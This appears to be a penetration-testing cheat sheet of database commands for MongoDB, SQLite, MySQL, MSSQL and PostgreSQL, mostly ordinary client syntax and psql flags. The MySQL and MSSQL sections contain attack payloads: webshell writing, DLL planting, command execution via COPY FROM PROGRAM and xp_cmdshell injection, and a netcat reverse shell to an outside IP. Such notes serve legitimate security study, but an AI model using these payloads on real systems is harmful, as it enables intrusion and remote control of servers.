SQL Database Uses

Mongo DB

mongo --host localhost --port 27017

show dbs;

use backup;

show collections;
user

db.user.find()

sqlite3

.tables
.schema table_name
SELECT * FROM table_name;
.exit

MySQL

show databases;
use database_name;
show tables;
select * from table_name;
system whoami
select load_file('C:\\\\Users\\Administrator\\Desktop\\proof.txt');
select '<?php phpinfo() ?>' into outfile 'C:\\\\windows\\www\\webshell.php';
select load_file('C:\\\\programdata\\privesc\\phoneinfo.dll') into dumpfile 'C:\\\\Windows\\system32\\phoneinfo.dll';
DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'id';select * from cmd_exec;
DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.232 443 >/tmp/f';select * from cmd_exec;

MSSQL

Select version

SELECT @@version;

Show all databases

SELECT name FROM sys.databases;

master, tempdb, model, and msdb are default databases.

Selecting database and showing available tables

SELECT * FROM offsec.information_schema.tables;

Selecting table and showing all columns

select * from offsec.dbo.users;

Oneliner for Enabling xp_cmdshell and executing commands

';EXECUTE sp_configure 'show advanced options', 1;RECONFIGURE;EXECUTE sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXECUTE xp_cmdshell 'whoami'--

';EXECUTE sp_configure 'show advanced options', 1;RECONFIGURE;EXECUTE sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXECUTE xp_cmdshell 'timeout /t 5'--

Postgresql


psql -U postgres  -h 10.4.216.215 -p 5432

#List avaliable databases
\l

#connect to database
\c confluence

#select everything from default user table
select * from cwd_user;

Reference : https://gist.github.com/Kartones/dd3ff5ec5ea238d4c546

Some interesting flags (to see all, use -h or --help depending on your psql version):

  • -E: will describe the underlaying queries of the \ commands (cool for learning!)

  • -l: psql will list all databases and then exit (useful if the user you connect with doesn't has a default database, like at AWS RDS)

Most \d commands support additional param of __schema__.name__ and accept wildcards like *.*

  • \?: Show help (list of available commands with an explanation)

  • \q: Quit/Exit

  • \c __database__: Connect to a database

  • \d __table__: Show table definition (columns, etc.) including triggers

  • \d+ __table__: More detailed table definition including description and physical disk size

  • \l: List databases

  • \dy: List events

  • \df: List functions

  • \di: List indexes

  • \dn: List schemas

  • \dt *.*: List tables from all schemas (if *.* is omitted will only show SEARCH_PATH ones)

  • \dT+: List all data types

  • \dv: List views

  • \dx: List all extensions installed

  • \df+ __function__ : Show function SQL code.

  • \x: Pretty-format query results instead of the not-so-useful ASCII tables

  • \copy (SELECT * FROM __table_name__) TO 'file_path_and_name.csv' WITH CSV: Export a table as CSV

  • \des+: List all foreign servers

  • \dE[S+]: List all foreign tables

  • \! __bash_command__: execute __bash_command__ (e.g. \! ls)

PreviousPSG SQLNextSQL Injection

Last updated